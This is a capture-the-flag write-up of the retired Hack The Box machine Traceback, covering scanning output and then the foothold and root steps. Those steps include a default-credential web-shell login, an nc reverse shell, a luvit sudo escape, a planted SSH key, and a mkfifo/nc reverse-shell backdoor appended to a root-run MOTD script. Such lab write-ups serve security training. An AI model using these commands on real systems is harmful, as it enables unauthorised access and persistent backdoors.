Posts [SEC-CTF] Hack The Box [M] Traceback (retired)
Post
Cancel

[SEC-CTF] Hack The Box [M] Traceback (retired)

Posted May 27 2020-05-27T23:41:00-03:00 by Felipe Rios
[SEC-CTF] Hack The Box [M] Traceback (retired)

Specifications

MetaOSNetworkFrom ToCreator(s)
TracebackLinux10.10.10.18114 Mar 2020 Xh4H
Easy / 20 ptstraceback.htb~29 Aug 2020

Basic Enumeration

1

sudo nmap -sS -sV --script=default,vuln -p- -T5 traceback.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.13s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Help us
| vulners:
|   cpe:/a:apache:http_server:2.4.29:
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2020-1927	5.8	https://vulners.com/cve/CVE-2020-1927
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2020-1934	5.0	https://vulners.com/cve/CVE-2020-1934
|     	CVE-2019-10081	5.0	https://vulners.com/cve/CVE-2019-10081
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2018-1333	5.0	https://vulners.com/cve/CVE-2018-1333
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2018-11763	4.3	https://vulners.com/cve/CVE-2018-11763
|_    	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.37 seconds

1

nikto -h traceback.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.181
+ Target Hostname:    traceback.htb
+ Target Port:        80
+ Start Time:         2020-05-28 01:51:51 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 459, size: 5911796d5b788, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7786 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-05-28 02:12:20 (GMT-3) (1229 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

1

sudo docker run --network="host" -v $(pwd):/app/code -w /app/code -it --rm dirsearch:v0.3.8 -u traceback.htb -E -r -t 100 -f -w web-shells.common.txt

1
2
3
4
5

http://traceback.htb/icons/
http://traceback.htb/icons/README
http://traceback.htb/index.html
http://traceback.htb/server-status
http://traceback.htb/smevk.php

Attack Steps

Foothold

User: sysadmin

  • Flag: /home/sysadmin/user.txt
  1. Login on shell: admin, admin (with this information)
  2. Try: nc -l -p 9090 -vvv with smevk.php
  3. Then, you have a reverse shell
  4. Check this information: sudo -l
  5. Exploit with this: sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/sh")'
  • Demonstration:
  • Trick:

Add your public key on authorized_keys, and access with ssh:

1
2

echo "ssh-rsa YOUR_HASH YOUR_USER@YOUR_HOST" >> /home/sysadmin/.ssh/authorized_keys
ssh sysadmin@traceback.htb

Own: root

  • Flag: /root/root.txt
  1. Watch process with this: watch ps -aux | tail -n 15
  2. Check this command on process list (execute by root):
    1

    /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
  3. Inject door to reverse shell:
    1
2

    mkdir /dev/shm/.rios0rios0
echo "mkfifo /dev/shm/.rios0rios0/pipe; nc -nv 10.10.14.56 9091 < /dev/shm/.rios0rios0/pipe | /bin/sh 2>/dev/shm/.rios0rios0/pipe >/dev/shm/.rios0rios0/pipe" >> /etc/update-motd.d/00-header
  4. Exploit with this: ssh sysadmin@traceback.htb (30s left to try it, before cron erase the script)
  • Demonstration:
Security, CTF, Hack The Box
sec ctf htb machine retired
This post is licensed under CC BY 4.0 by the author.

Recent Update

Contents

-

[SEC-CTF] Hack The Box [M] Admirer (active)

Comments powered by Disqus.